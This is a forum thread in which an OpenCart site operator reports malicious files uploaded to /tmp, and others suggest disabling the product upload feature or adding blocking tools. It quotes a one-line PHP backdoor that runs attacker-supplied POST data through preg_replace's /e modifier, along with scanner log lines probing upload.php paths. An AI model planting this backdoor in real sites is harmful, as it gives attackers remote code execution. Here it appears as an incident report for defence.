Post by garyw75 » Wed Aug 14, 2019 4:27 pm

We are a design agency purely running Opencart on our servers. Versions we have installed range from 1.5.6.4 upwards.

Our malware and virus software on the webserver is starting to pick up files in the /tmp folder. The files are in the format of Opencart sessions so we believe Opencarts upload functionality is the source of the file creation.

Overnight we see mainly 1.5.6.4 creating the files but there has been one or two instances of version 3 doing it.

-rw------- 1 website website 1400195 Aug 13 16:26 20190813-162642-XVLWsnW@S2pF81WGLe3uagAAAA0-file-uLQeCe

The files contain malicious code like this:-

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>[root@host tmp]#

On checking the logs we can see automated crawlers scanning for upload scripts on most of our servers:-

[12/Aug/2019:22:28:23 +0100] "POST /chat/upload.php HTTP/1.1" 301 537 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /Chat/upload.php HTTP/1.1" 301 481 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /en/upload.php HTTP/1.1" 301 477 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /chat/FlashChat_v608/chat/upload.php HTTP/1.1" 301 521 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /radio/radiochat/upload.php HTTP/1.1" 301 503 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:25 +0100] "POST /websci/radio/radiochat/upload.php HTTP/1.1" 301 517 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:25 +0100] "POST /o/BhGCe/forums.e-mpire.com/chat/upload.php HTTP/1.1" 301 561 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:26 +0100] "POST /cms/chat/upload.php HTTP/1.1" 301 489 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

They are scanning for vulnerable upload pages in all different types of software. Presumably one of the checks is for Opencarts upload functionality.

As I have already said we do not have anything else on the server apart from Opencart. I have checked CVE Details for any new vulnerabilities but nothing is listed.

Can anyone check if they are experiencing the same thing. Or can offer any advise?

Thanks very much
Gary

Newbie

Posts

Joined
Thu May 12, 2016 7:59 pm

Post by webdesires » Fri Aug 16, 2019 8:23 pm

there is an issue where by a bot can upload files using the file upload feature on products, what we do usually is disable this code for clients not using products with an upload to close this potential issue.

However noone can actually access these files to run the code anyway so its not any issue as long as they cannot get into the download folder to run them, there is a potentially more serious issue in opencart 1.5 especially where they could actually run these, ive seen it happen and not 100% sure how they figure that out. But my recommendation would be to just disable the upload code in /catalog/controller/product.php if its not being used.

Regards, WebDesires.
We are a team of developers in the UK - professional and friendly, message us or give us a call anytime and we will be happy to help.

Phone: +44 (0) 121 318 6336 - Web: webdesires.co.uk - Skype: WebDesires
OpenCart Support - OpenCart Web Development - Our OpenCart Plugins


User avatar
New member

Posts

Joined
Mon Sep 28, 2015 6:34 pm
Location - West Midlands, United Kingdom

Post by johnp » Fri Aug 16, 2019 11:04 pm

Stick crawlprotect or CIDRAM on and it will block that.

Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD 2.6.1 lover, user and geek.
Fast and Affordable Service for Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
https://www.asandwhenbusinessservices.co.uk


User avatar
Active Member

Posts

Joined
Fri Mar 25, 2011 10:25 am
Location - Surrey, UK
Who is online

Users browsing this forum: No registered users and 55 guests